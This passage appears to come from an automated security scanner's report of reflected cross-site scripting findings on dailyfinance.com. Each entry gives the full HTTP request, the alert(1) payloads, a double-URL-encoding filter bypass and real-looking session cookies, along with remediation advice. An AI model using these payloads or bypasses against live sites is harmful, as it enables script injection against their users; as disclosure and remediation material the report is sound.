This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/currencies/?c7c5d"-alert(1)-"2972ce4d413=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.347. http://www.dailyfinance.com/market-news/futures/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/market-news/futures/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae5a"-alert(1)-"661e80f0291 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/futures/?fae5a"-alert(1)-"661e80f0291=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.348. http://www.dailyfinance.com/market-news/futures/commodities/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/market-news/futures/commodities/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed6bf"-alert(1)-"cca0a4d548f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/futures/commodities/?ed6bf"-alert(1)-"cca0a4d548f=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.349. http://www.dailyfinance.com/market-news/international/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/market-news/international/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a8b8"-alert(1)-"d40344d64df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/international/?8a8b8"-alert(1)-"d40344d64df=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ead7'%3b01fd5909b1 was submitted in the REST URL parameter 2. This input was echoed as 1ead7';01fd5909b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/mostactives1ead7'%3b01fd5909b1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Market Movers:</titl ...[SNIP]... <!-- var relegenceTopics='MOSTACTIVES1EAD7';01FD5909B1'; var RTN_SNIPPET_SIZE = '300'; var RTN_HOVER_TIMEOUT = '16000'; // --> ...[SNIP]...
1.351. http://www.dailyfinance.com/press-releases/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/press-releases/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab488"-alert(1)-"b3fecd9a6b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /press-releases/?ab488"-alert(1)-"b3fecd9a6b3=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea316'%3b11184aed841 was submitted in the REST URL parameter 3. This input was echoed as ea316';11184aed841 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/bank-of-america-corporation/bacea316'%3b11184aed841/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a37%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e82092af8370 was submitted in the REST URL parameter 3. This input was echoed as 15a37"><script>alert(1)</script>82092af8370 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/bank-of-america-corporation/bac15a37%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e82092af8370/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb1c5cc44fe was submitted in the REST URL parameter 3. This input was echoed as f5e0d"><script>alert(1)</script>fb1c5cc44fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/citigroup-incorporated/cf5e0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb1c5cc44fe/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb633'%3bce592cb8e82 was submitted in the REST URL parameter 3. This input was echoed as eb633';ce592cb8e82 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/citigroup-incorporated/ceb633'%3bce592cb8e82/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c977d'%3b34995d9ca3b was submitted in the REST URL parameter 3. This input was echoed as c977d';34995d9ca3b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/complete-production-services-inc/cpxc977d'%3b34995d9ca3b/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b39cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e964ca8a9ae6 was submitted in the REST URL parameter 3. This input was echoed as b39cf"><script>alert(1)</script>964ca8a9ae6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/complete-production-services-inc/cpxb39cf%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e964ca8a9ae6/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41711%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e832a8319c25 was submitted in the REST URL parameter 3. This input was echoed as 41711"><script>alert(1)</script>832a8319c25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/daqq-new-energy-corp-american-depositary-shares-each-representing-five-ordinary-shares/dq41711%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e832a8319c25/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8aaf3'%3b9e8dbdc7c01 was submitted in the REST URL parameter 3. This input was echoed as 8aaf3';9e8dbdc7c01 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/daqq-new-energy-corp-american-depositary-shares-each-representing-five-ordinary-shares/dq8aaf3'%3b9e8dbdc7c01/nys HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bdbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec53359abab7 was submitted in the REST URL parameter 3. This input was echoed as 3bdbd"><script>alert(1)</script>c53359abab7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/dax-performance-index/dax3bdbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec53359abab7/dei HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e68c5'%3b751d00d2e1 was submitted in the REST URL parameter 3. This input was echoed as e68c5';751d00d2e1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/dax-performance-index/daxe68c5'%3b751d00d2e1/dei HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ca30'%3b0cf1d63329d was submitted in the REST URL parameter 3. This input was echoed as 4ca30';0cf1d63329d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/dow-jones-industrial-average/$indu4ca30'%3b0cf1d63329d/dji HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca685%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e02a9bda659a was submitted in the REST URL parameter 3. This input was echoed as ca685"><script>alert(1)</script>02a9bda659a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/dow-jones-industrial-average/$induca685%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e02a9bda659a/dji HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ab04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74877c9a21c was submitted in the REST URL parameter 3. This input was echoed as 9ab04"><script>alert(1)</script>74877c9a21c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/euro-b-vs-united-states-dollar-spot-eur-usd/eurusd9ab04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74877c9a21c/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37b3b'%3b64d540556e0 was submitted in the REST URL parameter 3. This input was echoed as 37b3b';64d540556e0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/euro-b-vs-united-states-dollar-spot-eur-usd/eurusd37b3b'%3b64d540556e0/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6428%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22c1c1970b4 was submitted in the REST URL parameter 3. This input was echoed as f6428"><script>alert(1)</script>22c1c1970b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
